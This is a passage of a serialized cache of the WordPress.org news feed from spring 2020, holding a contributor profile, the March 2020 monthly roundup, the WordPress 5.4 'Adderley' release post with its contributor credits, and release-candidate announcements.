From the core team to supporting and organizing WordCamps, Mario has long been an active contributor to the global WordPress project. He is passionate about the connections fostered by people who are involved in building both the WordPress software and the community around it.

\n\n\n\n

“The WordPress community consists of people of all race and color, living all around the world, working as teachers, developers, bloggers, designers, business owners. Let’s work together to help each other. Let’s stick together and show  the world WordPress can help make it a better place.”

Mario Peshev
\n\n\n\n

Contributors

\n\n\n\n

Thanks to Alison Rothwell (@wpfiddlybits), Yvette Sonneveld (@yvettesonneveld), Abha Thakor (@webcommsat), Josepha Haden (@chanthaboune) and Topher DeRosia (@topher1kenobe). Thank you to Mario Peshev (@nofearinc) for sharing his #ContributorStory.

\n\n\n\n
\"HeroPress
\n\n\n\n

This post is based on an article originally published on HeroPress.com, a community initiative created by Topher DeRosia. HeroPress highlights people in the WordPress community who have overcome barriers and whose stories would otherwise go unheard.

\n\n\n\n

Meet more WordPress community members over at HeroPress.com!

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8536\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:57:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"The Month in WordPress: March 2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2020/04/the-month-in-wordpress-march-2020/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Apr 2020 12:01:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8532\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:363:\"The month of March was both a tough and exciting time for the WordPress open-source project. With COVID-19 declared a pandemic, in-person events have had to adapt quickly – a challenge for any community. March culminated with the release of WordPress 5.4, an exhilarating milestone only made possible by dedicated contributors. For all the latest, […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8588:\"\n

The month of March was both a tough and exciting time for the WordPress open-source project. With COVID-19 declared a pandemic, in-person events have had to adapt quickly – a challenge for any community. March culminated with the release of WordPress 5.4, an exhilarating milestone only made possible by dedicated contributors. For all the latest, read on. 

\n\n\n\n
\n\n\n\n

WordPress 5.4 “Adderley”

\n\n\n\n

WordPress 5.4 “Adderley” was released on March 31 and includes a robust list of new blocks, enhancements, and new features for both users and developers. The primary focus areas of this release included the block editor, privacy, accessibility, and developer improvements, with the full list of enhancements covered in the 5.4 field guide.

\n\n\n\n

Want to get involved in building WordPress Core? Follow the Core team blog, and join the #core channel in the Making WordPress Slack group.

\n\n\n\n

Releases of Gutenberg 7.7 and 7.8

\n\n\n\n

It’s been another busy month for Gutenberg, this time with the release of Gutenberg 7.7 and 7.8. Gutenberg 7.7 introduced block patterns – predefined block layouts that are ready to use and tweak. This is an important step towards Full Site Editing, which is currently targeted for inclusion in WordPress 5.6. As a first iteration, you can pick and insert patterns from the Block Patterns UI, which has been added as a sidebar plugin.

\n\n\n\n

Gutenberg 7.7 also includes a refresh of the Block UI, which better responds to the ways users interact with the editor. For more information on the User UI and Block Patterns, read this summary of the most recent Block-Based Themes meeting. Gutenberg 7.8, introduced on March 25, further enhanced this Block UI redesign. Both releases also included a suite of improvements, bug fixes, new APIs, documentation, and more!

\n\n\n\n

Want to get involved in building Gutenberg? Follow the Core team blog, contribute to Gutenberg on GitHub, and join the #core-editor channel in the Making WordPress Slack group.

\n\n\n\n

WordCamp cancellations and shift to online events

\n\n\n\n

In early March, the Community team issued new recommendations for event organizers in light of growing concerns around COVID-19. Following this guidance, and with COVID-19 declared a pandemic, WordPress community organizers reluctantly but responsibly postponed or canceled their upcoming WordCamps and meetups.

\n\n\n\n

As community events are an important part of the WordPress open-source project, the Community team made suggestions for taking charity hackathons online, proposed interim adjustments to existing community event guidelines, and provided training for online conference organizing with Crowdcast. The team is currently working on building a Virtual Events Handbook that will continue to support WordPress community organizers at this time. 

\n\n\n\n

Want to get involved with the WordPress Community team, host your own virtual WordPress event, or help improve the documentation for all of this? Follow the Community team blog, learn more about virtual events, and join the #community-events channel in the Making WordPress Slack group.

\n\n\n\n

Link your GitHub profile to WordPress.org

\n\n\n\n

Last month, an experimental feature was added to Trac, WordPress Core’s bug-tracking system, to improve collaboration between Trac and GitHub. This month, to help make tracking contributions to the WordPress project across multiple locations easier, there is a new option to connect your GitHub account to your WordPress.org profile. This connection allows for more accurate acknowledgement and recognition of contributors. You can connect your GitHub account to your WordPress.org account by editing your WordPress.org profile.

\n\n\n\n

For more information and instructions on how to connect your accounts, read the announcement post.

\n\n\n\n

Modernizing WordPress coding standards

\n\n\n\n

Defined coding standards is an important step in creating the consistent codebase needed to prepare for requiring PHP 7.x for WordPress Core. As such, coding standards have been proposed for implementation in WordPress Coding Standards 3.0.0. This includes new proposed standards for namespace declarations, import use statements, fully qualified names in inline code, traits and interfaces, type declarations, declare statements/strict typing, the ::class constant, operators, and more. 

\n\n\n\n

Want to get involved or view the full list of currently proposed new coding standards? Visit and add your feedback to the post on updating the Coding standards for modern PHP and follow the Core team blog.

\n\n\n\n
\n\n\n\n

Further Reading:

\n\n\n\n\n\n\n\n

Have a story that we should include in the next “Month in WordPress” post? Please submit it here.

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8532\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:58:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n\n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"WordPress 5.4 “Adderley”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"https://wordpress.org/news/2020/03/adderley/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 31 Mar 2020 19:04:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8455\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:255:\"Version 5.4 \"Adderley\" of WordPress is available for download or update in your WordPress dashboard. This version brings you more ways to make content come alive with your best images and helps make your vision real by putting blocks in the perfect place.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:45:\"https://s.w.org/images/core/5.4/textcolor.mp4\";s:6:\"length\";s:6:\"440616\";s:4:\"type\";s:9:\"video/mp4\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:52946:\"\n

Here it is! Named “Adderley” in honor of Nat Adderley, the latest and greatest version of WordPress is available for download or update in your dashboard.

\n\n\n\n
\"\"
\n\n\n\n
\n

Say hello to more and better.

\n\n\n\n

More ways to make your pages come alive. With easier ways to get it all done and looking better than ever—and boosts in speed you can feel.

\n
\n\n\n\n
\n\n\n\n

Welcome to WordPress 5.4

\n\n\n\n

Every major release adds more to the block editor.

\n\n\n\n

More ways to make posts and pages come alive with your best images. More ways to bring your visitors in, and keep them engaged, with the richness of embedded media from the web’s top services.

\n\n\n\n

More ways to make your vision real, and put blocks in the perfect place—even if a particular kind of block is new to you. More efficient processes.

\n\n\n\n

And more speed everywhere, so as you build sections or galleries, or just type in a line of prose, you can feel how much faster your work flows.

\n\n\n\n
\n\n\n\n
\"\"
\n\n\n\n

Two new blocks. And better blocks overall.

\n\n\n\n\n\n\n\n
\n\n\n\n
\n\n\n\n

Cleaner UI, clearer navigation—and easier tabbing!

\n\n\n\n\n\n\n\n

Of course, if you want to work with the very latest tools and features, install the Gutenberg plugin. You’ll get to be the first to use new and exciting features in the block editor before anyone else has seen them!

\n\n\n\n
\n\n\n\n
\"\"
\n\n\n\n

Your fundamental right: privacy

\n\n\n\n

5.4 helps with a variety of privacy issues around the world. So when users and stakeholders ask about regulatory compliance, or how your team handles user data, the answers should be a lot easier to get right.

\n\n\n\n

Take a look:

\n\n\n\n\n\n\n\n
\n\n\n\n
\"\"
\n\n\n\n

Just for developers

\n\n\n\n

Add custom fields to menu items—natively

\n\n\n\n

Two new actions let you add custom fields to menu items—without a plugin and without writing custom walkers.

\n\n\n\n

On the Menus admin screen, wp_nav_menu_item_custom_fields fires just before the move buttons of a nav menu item in the menu editor.

\n\n\n\n

In the Customizer, wp_nav_menu_item_custom_fields_customize_template fires at the end of the menu-items form-fields template.

\n\n\n\n

Check your code and see where these new actions can replace your custom code, and if you’re concerned about duplication, add a check for the WordPress version.

\n\n\n\n

Blocks! Simpler styling, new APIs and embeds

\n\n\n\n\n\n\n\n

There’s lots more for developers to love in WordPress 5.4. To discover more and learn how to make these changes shine on your sites, themes, plugins and more, check the WordPress 5.4 Field Guide.

\n\n\n\n
\n\n\n\n

The Squad

\n\n\n\n

This release was led by Matt MullenwegFrancesca Marano, and David Baumwald. They were enthusiastically supported by a release squad:

\n\n\n\n\n\n\n\n

The squad was joined throughout the release cycle by 552 generous volunteer contributors who collectively worked on 361 tickets on Trac and 1226 pull requests on GitHub.

\n\n\n\n

Put on a Nat Adderley playlist, click that update button (or download it directly), and check the profiles of the fine folks that helped:

\n\n\n0v3rth3d4wn, 123host, 1naveengiri, Aaron Jorbin, Abhijit Rakas, abrightclearweb, acosmin, Adam Silverstein, adamboro, Addie, adnan.limdi, Aezaz Shaikh, Aftab Ali Muni, Aki Björklund, Akib, Akira Tachibana, akshayar, Alain Schlesser, Albert Juhé Lluveras, Alex Concha, Alex Mills, AlexHolsgrove, alexischenal, alextran, alishankhan, allancole, Allen Snook, alpipego, Amir Seljubac, Amit Dudhat, Amol Vhankalas, Amr Gawish, Amy Kamala, Anantajit JG, Anders Norén, Andrés, Andrea Fercia, Andrea Tarantini, andreaitm, Andrei Draganescu, Andrew Dixon, Andrew Duthie, Andrew Nacin, Andrew Ozz, Andrew Serong, Andrew Wilder, Andrey Savchenko, Andy Fragen, Andy Meerwaldt, Andy Peatling, Angelika Reisiger, Ankit Panchal, Anthony Burchell, Anthony Ledesma, apedog, Apermo, apieschel, Aravind Ajith, archon810, arenddeboer, Ari Stathopoulos, arnaudbroes, Arslan Ahmed, ashokrd2013, Ataur R, Ate Up With Motor, autotutorial, Ayesh Karunaratne, BackuPs, bahia0019, Bappi, Bart Czyz, ben.greeley, benedictsinger, Benjamin Intal, bibliofille, bilgilabs, Birgir Erlendsson, Birgit Pauli-Haack, BMO, Boga86, Boone Gorges, Brad Markle, Brandon Kraft, Brent Swisher, Cameron Voell, Carolina Nymark, ceyhun0, Chetan Prajapati, Chetan Satasiya, Chintesh Prajapati, Chip Snyder, Chris Klosowski, Chris Trynkiewicz (Sukces Strony), Chris Van Patten, Christian Sabo, Christiana Mohr, clayisland, Copons, Corey McKrill, crdunst, Csaba (LittleBigThings), Dademaru, Damián Suárez, Daniel Bachhuber, Daniel James, Daniel Llewellyn, Daniel Richards, Daniele Scasciafratte, daniloercoli, Darren Ethier (nerrad), darrenlambert, Dave Mackey, Dave Smith, daveslaughter, DaveWP196, David Artiss, David Binovec, David Herrera, David Ryan, David Shanske, David Stone, Debabrata Karfa, dekervit, Delowar Hossain, Denis Yanchevskiy, Dhaval kasavala, dhurlburtusa, Dilip Bheda, dingo-d, Dion Hulse, dipeshkakadiya, djp424, dominic_ks, Dominik Schilling, Dono12, Dotan Cohen, dphiffer, dragosh635, Drew Jaynes, dudo, eclev91, ecotechie, eden159, Edi Amin, edmundcwm, Eduardo Toledo, ehtis, Ella van Durpe, Ellen Bauer, Emil E, Enrique Piqueras, Enrique Sánchez, equin0x80, erikkroes, Estela Rueda, Fabian, Fabian Kägy, Fahim Murshed, Faisal Alvi, Felipe Elia, Felipe Santos, Felix Arntz, Fernando Souza, fervillz, fgiannar, flaviozavan, Florian TIAR, Fotis Pastrakis, Frank Martin, Gal Baras, Garrett Hyder, Gary Jones, Gary Pendergast, Gaurang Dabhi, George Stephanis, geriux, Girish Panchal, Gleb Kemarsky, Glenn, Goto Hayato, grafruessel, Greg Rickaby, Grzegorz Ziółkowski, Grzegorz.Janoszka, Gustavo Bordoni, gwwar, hamedmoodi, hAmpzter, happiryu, Hareesh Pillai, Harry Milatz, Haz, helgatheviking, Henry Holtgeerts, Himani Lotia, Hubert Kubiak, i3anaan, Ian Belanger, Ian Dunn, ianatkins, ianmjones, IdeaBox Creations, Ihtisham Zahoor, intimez, Ipstenu (Mika Epstein), Isabel Brison, ispreview, Jake Spurlock, Jakub Binda, James Huff, James Koster, James Nylen, jameslnewell, Janki Moradiya, Jarret, Jasper van der Meer, jaydeep23290, jdy68, Jean-Baptiste Audras, Jean-David Daviet, Jeff Bowen, Jeff Ong, Jeff Paul, Jeffrey Carandang, jeichorn, Jenil Kanani, Jenny Wong, jepperask, Jer Clarke, Jeremy Felt, Jeremy Herve, Jeroen Rotty, Jerry Jones, Jessica Lyschik, Jip Moors, Joe Dolson, Joe Hoyle, Joe McGill, Joen Asmussen, John Blackbourn, John James Jacoby, John Watkins, Jon, Jon Quach, Jon Surrell, Jonathan Desrosiers, Jonathan Goldford, Jonny Harris, Jono Alderson, Joonas Vanhatapio, Joost de Valk, Jorge Bernal, Jorge Costa, Josepha Haden, JoshuaWold, Joy, jqz, jsnajdr, Juanfra Aldasoro, Julian Weiland, julian.kimmig, Juliette Reinders Folmer, Julio Potier, Junko Nukaga, jurgen, justdaiv, Justin Ahinon, K. Adam White, kaggdesign, KalpShit Akabari, Kantari Samy, Kaspars, Kelly Dwan, Kennith Nichol, Kevin Hagerty, Kharis Sulistiyono, Khushbu Modi, killerbishop, kinjaldalwadi, kitchin, Kite, Kjell Reigstad, kkarpieszuk, Knut Sparhell, KokkieH, Konstantin Obenland, Konstantinos Xenos, Krystyna, kubiq, kuflievskiy, Kukhyeon Heo, kyliesabra, Laken Hafner, leandroalonso, leogermani, lgrev01, linuxologos, lisota, Lorenzo Fracassi, luisherranz, luisrivera, lukaswaudentio, Lukasz Jasinski, Luke Cavanagh, Lydia Wodarek, M A Vinoth Kumar, maciejmackowiak, Mahesh Waghmare, Manzoor Wani, marcelo2605, Marcio Zebedeu, MarcoZ, Marcus Kazmierczak, Marek Dědič, Marius Jensen, Marius84, Mark Jaquith, Mark Marzeotti, Mark Uraine, MarkRH, Martin Stehle, Marty Helmick, Mary Baum, Mat Gargano, Mat Lipe, Mathieu Viet, Matias Ventura, Matt Keys, Matt van Andel, mattchowning, mattcursor, Matthew Kevins, mattyrob, maxme, mayanksonawat, mbrailer, Mehidi Hassan, Mel Choyce-Dwan, mensmaximus, Michael Arestad, Michael Ecklund, Michael Panaga, Michelle Schulp, mickaelperrin, miette49, Miguel Fonseca, Miguel Torres, mihdan, Miina Sikk, Mikael Korpela, Mike Auteri, Mike Hansen, Mike Schinkel [WPLib Box project lead], Mike Schroder, mikejdent, Mikko Saari, Milan Patel, Milan Petrovic, mimi, mircoraffinetti, mjnewman, mlbrgl, Mohammad Jangda, Morgan Estes, Morteza Geransayeh, mppfeiffer, mryoga, Muhammad Usama Masood, mujuonly, Mukesh Panchal, Nadir Seghir, nagoke, Nahid Ferdous Mohit, Nate Finch, Nazmul Ahsan, nekomajin, NextScripts, Nick Daugherty, Nick Halsey, Nicklas Sundberg, Nicky Lim, nicolad, Nicolas Juen, nicole2292, Niels Lange, nikhilgupte, nilamacharya, noahtallen, noyle, nsubugak, oakesjosh, oldenburg, Omar Alshaker, Otto Kekäläinen, Ov3rfly, Paal Joachim Romdahl, page-carbajal, pagewidth, Paragon Initiative Enterprises, Pascal Birchler, Pascal Casier, Paul Bearne, Paul Biron, Paul Kevin, Paul Schreiber, pcarvalho, Pedro Mendonça, perrywagle, Peter Westwood, Peter Wilson, Philip Jackson, Pierre Gordon, Pierre Lannoy, pikamander2, Prashant Singh, Pratik Jain, Presskopp, Priyanka Behera, r-a-y, Raam Dev, Rachel Cherry, Rachel Peter, ragnarokatz, Rami Yushuvaev, raoulunger, razamalik, Remco Tolsma, rephotsirch, rheinardkorf, Riad Benguella, Ricard Torres, Rich Tabor, rimadoshi, Rinku Y, Rob Cutmore, Rob Migchels, rob006, Robert Anderson, Roi Conde, Roland Murg, Rostislav Wolný, Roy Tanck, Russell Heimlich, Ryan, Ryan Fredlund, Ryan McCue, Ryan Welcher, Ryo, Sébastien SERRE, Søren Brønsted, sablednah, Sampat Viral, Samuel Wood (Otto), SamuelFernandez, Sander, santilinwp, Sathiyamoorthy V, Schuhwerk, Scott Reilly, Scott Taylor, scruffian, scvleon, Sebastian Pisula, Sergey Biryukov, Sergio de Falco, sergiomdgomes, sgastard, sgoen, Shaharia Azam, Shannon Smith, shariqkhan2012, Shawntelle Coker, sheparddw, Shital Marakana, Shizumi Yoshiaki, simonjanin, sinatrateam, sirreal, skorasaurus, smerriman, socalchristina, Soren Wrede, spenserhale, sproutchris, squarecandy, Stanimir Stoyanov, starvoters1, SteelWagstaff, steevithak, Stefano Minoia, Stefanos Togoulidis, steffanhalv, Stephen Bernhardt, Stephen Edgar, Steve Dufresne, Steve Grunwell, stevenlinx, Stiofan, straightvisions GmbH, stroona.com, Subrata Mal, Subrata Sarkar, Sultan Nasir Uddin, swapnild, Sybre Waaijer, Sérgio Estêvão, Takayuki Miyauchi, Takeshi Furusato, Tammie Lister, Tanvirul Haque, TBschen, tdlewis77, Tellyworth, Thamaraiselvam, thefarlilacfield, ThemeZee, Tim Havinga, Tim Hengeveld, timon33, Timothée Brosille, Timothy Jacobs, Tkama, tmanoilov, tmatsuur, tobifjellner (Tor-Bjorn Fjellner), Tom Greer, Tom J Nowell, tommix, Toni Viemerö, Toro_Unit (Hiroshi Urabe), torres126, Torsten Landsiedel, Towhidul Islam, treecutter, tristangemus, tristanleboss, tsuyoring, Tung Du, Udit Desai, Ulrich, upadalavipul, Utsav tilava, Vaishali Panchal, Valentin Bora, Varun Shanbhag, Veminom, Vinita Tandulkar, virgodesign, Vlad. S., vortfu, waleedt93, WebMan Design | Oliver Juhas, websupporter, Weston Ruter, William Earnhardt, William Patton, wpgurudev, WPMarmite, wptoolsdev, xedinunknown-1, yale01, Yannicki, yohannp, Yordan Soares, Yui, zachflauaus, Zack Tollman, Zebulan Stanphill, Zee, and zsusag.\n\n\n\n
\n\n\n\n

Many thanks to all of the community volunteers who contribute in the support forums. They answer questions from people across the world, whether they are using WordPress for the first time or since the first release. These releases are more successful for their efforts!

\n\n\n\n

Finally, thanks to all the community translators who worked on WordPress 5.4. Their efforts bring WordPress fully translated to 46 languages at release time, with more on the way.

\n\n\n\n

If you want to learn more about volunteering with WordPress, check out Make WordPress or the core development blog.

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8455\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:60:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"WordPress 5.4 RC5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/2020/03/wordpress-5-4-rc5/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 28 Mar 2020 00:47:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8451\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:379:\"The fifth release candidate for WordPress 5.4 is live! WordPress 5.4 is currently scheduled to land on March 31 2020, and we need your help to get there—if you haven’t tried 5.4 yet, now is the time! You can test the WordPress 5.4 release candidate in two ways: Try the WordPress Beta Tester plugin (choose the “bleeding edge nightlies” option) […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"David Baumwald\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2181:\"\n


The fifth release candidate for WordPress 5.4 is live!

\n\n\n\n

WordPress 5.4 is currently scheduled to land on March 31 2020, and we need your help to get there—if you haven’t tried 5.4 yet, now is the time!

\n\n\n\n

You can test the WordPress 5.4 release candidate in two ways:

\n\n\n\n\n\n\n\n

For details about what to expect in WordPress 5.4, please see the first release candidate post.

\n\n\n\n

Plugin and Theme Developers

\n\n\n\n

Please test your plugins and themes against WordPress 5.4 and update the Tested up to version in the readme to 5.4. The priority in testing is compatibility. If you find issues, please be sure to post to the support forums so we can figure them out before the final release.

\n\n\n\n

The WordPress 5.4 Field Guide is also out! It’s your source for details on all the major changes.

\n\n\n\n

How to Help

\n\n\n\n

Do you speak a language besides English? Help us translate WordPress into more than 100 languages!

\n\n\n\n

If you think you’ve found a bug, you can post to the Alpha/Beta area in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, file one on WordPress Trac, where you can also find a list of known bugs.

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8451\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:60:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"WordPress 5.4 RC4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/2020/03/wordpress-5-4-rc4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 24 Mar 2020 22:00:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8444\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:388:\"The fourth release candidate for WordPress 5.4 is live! WordPress 5.4 is currently scheduled to land on March 